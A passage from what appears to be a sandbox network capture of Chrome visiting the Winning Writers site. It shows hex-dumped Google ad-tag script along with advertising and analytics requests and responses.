                                                                                                                                                                                            2024-11-18 20:00:24 UTC1378INData Raw: 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c 7c 52 28 22 53 69 6c 6b 22 29 7d 3b 21 52 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 55 28 29 3b 55 28 29 3b 52 28 22 53 61 66 61 72 69 22 29 26 26 28 55 28 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c
                                                                                                                                                                                            Data Ascii: Of(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("CriOS"))&&!(T()?0:R("Edge"))||R("Silk")};!R("Android")||U();U();R("Safari")&&(U()||(T()?0:R("Coast"))||(T()?0:R("Opera"))||(T()?0:R("Edge"))|
                                                                                                                                                                                            2024-11-18 20:00:24 UTC1378INData Raw: 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 58 3d 5b 22 73 73 5f 22 5d 2c 59 3d 73 7c 7c 7a 3b 58 5b 30 5d 69 6e 20 59 7c 7c 74 79 70 65 6f 66 20 59 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 59 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 58 5b 30 5d 29 3b 20 66 6f 72 28 76 61 72 20 5a 3b 58 2e 6c 65 6e 67 74 68 26 26 28 5a 3d 58 2e 73 68 69 66 74 28 29 29 3b 29 58 2e
                                                                                                                                                                                            Data Ascii: &&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d[f.g]}e()}var X=["ss_"],Y=s||z;X[0]in Y||typeof Y.execScript=="undefined"||Y.execScript("var "+X[0]); for(var Z;X.length&&(Z=X.shift());)X.
                                                                                                                                                                                            2024-11-18 20:00:24 UTC108INData Raw: 2d 54 4a 6f 44 77 62 5a 6e 4f 38 69 5f 5f 58 31 72 6b 54 41 66 64 55 6d 63 6e 46 72 5f 57 4f 55 54 36 75 4c 4a 78 71 68 38 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 32 33 31 38 31 32 36 30 36 37 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: -TJoDwbZnO8i__X1rkTAfdUmcnFr_WOUT6uLJxqh8\x26random\x3d2318126067\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            132192.168.2.1649870142.250.185.1944436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:25 UTC1269OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960022416&cv=11&fst=1731960022416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:25 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:25 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:25 UTC675INData Raw: 31 33 32 64 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 132d(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:25 UTC1378INData Raw: 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 63 3d 63 5b 63 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 70 26 26 64 3d 3d 3d 22 65 73 36 22 3f 67 5b 63 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 64 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 68 28 74 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 3a 62 21 3d 3d 64 26 26 28 76 5b 63 5d 3d 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                            Data Ascii: r c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0
                                                                                                                                                                                            2024-11-18 20:00:25 UTC1378INData Raw: 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c 7c 52 28 22 53 69 6c 6b 22 29 7d 3b 21 52 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 55 28 29 3b 55 28 29 3b 52 28 22 53 61 66 61 72 69 22 29 26 26 28 55 28 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c
                                                                                                                                                                                            Data Ascii: Of(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("CriOS"))&&!(T()?0:R("Edge"))||R("Silk")};!R("Android")||U();U();R("Safari")&&(U()||(T()?0:R("Coast"))||(T()?0:R("Opera"))||(T()?0:R("Edge"))|
                                                                                                                                                                                            2024-11-18 20:00:25 UTC1378INData Raw: 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 58 3d 5b 22 73 73 5f 22 5d 2c 59 3d 73 7c 7c 7a 3b 58 5b 30 5d 69 6e 20 59 7c 7c 74 79 70 65 6f 66 20 59 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 59 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 58 5b 30 5d 29 3b 20 66 6f 72 28 76 61 72 20 5a 3b 58 2e 6c 65 6e 67 74 68 26 26 28 5a 3d 58 2e 73 68 69 66 74 28 29 29 3b 29 58 2e
                                                                                                                                                                                            Data Ascii: &&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d[f.g]}e()}var X=["ss_"],Y=s||z;X[0]in Y||typeof Y.execScript=="undefined"||Y.execScript("var "+X[0]); for(var Z;X.length&&(Z=X.shift());)X.
                                                                                                                                                                                            2024-11-18 20:00:25 UTC108INData Raw: 44 2d 4c 31 37 71 71 73 70 52 66 44 4c 6c 4c 76 72 76 53 53 4e 61 48 77 78 77 51 6d 58 76 76 4c 39 79 5f 73 46 66 2d 45 69 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 31 38 34 35 31 34 38 30 35 32 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: D-L17qqspRfDLlLvrvSSNaHwxwQmXvvL9y_sFf-Ei\x26random\x3d1845148052\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            133192.168.2.1649869142.250.185.1644436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:25 UTC1515OUTGET /pagead/1p-user-list/1072733940/?random=1731960022416&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dQ4fiNAV-TJoDwbZnO8i__X1rkTAfdUmcnFr_WOUT6uLJxqh8&random=2318126067&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:25 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:25 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:25 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            134192.168.2.1649871142.250.186.1324436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:26 UTC1277OUTGET /pagead/1p-user-list/1072733940/?random=1731960022416&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dQ4fiNAV-TJoDwbZnO8i__X1rkTAfdUmcnFr_WOUT6uLJxqh8&random=2318126067&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:26 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:26 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:26 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            135192.168.2.1649872216.239.34.1814436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:28 UTC1378OUTPOST /g/collect?v=2&tid=G-S2XE0RVPX9&gtm=45je4be0v889608727z8846709124za200zb846709124&_p=1731960005145&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067554~102067808~102077855~102081484&cid=723902191.1731960008&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=3&sid=1731960008&sct=1&seg=1&dl=https%3A%2F%2Fwinningwriters.com%2F&dt=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&en=slider_change&ep.event_category=Slider&ep.event_label=Ad-Top&ep.value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&_et=8828&tfd=28204 HTTP/1.1
                                                                                                                                                                                            Host: analytics.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:28 UTC849INHTTP/1.1 204 No Content
                                                                                                                                                                                            Access-Control-Allow-Origin: https://winningwriters.com
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:28 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                            Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                            Server: Golfe2
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            136192.168.2.1649874142.250.185.1304436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:31 UTC1603OUTGET /td/rul/1072733940?random=1731960030432&cv=11&fst=1731960030432&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1
                                                                                                                                                                                            Host: td.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:32 UTC646INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:32 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
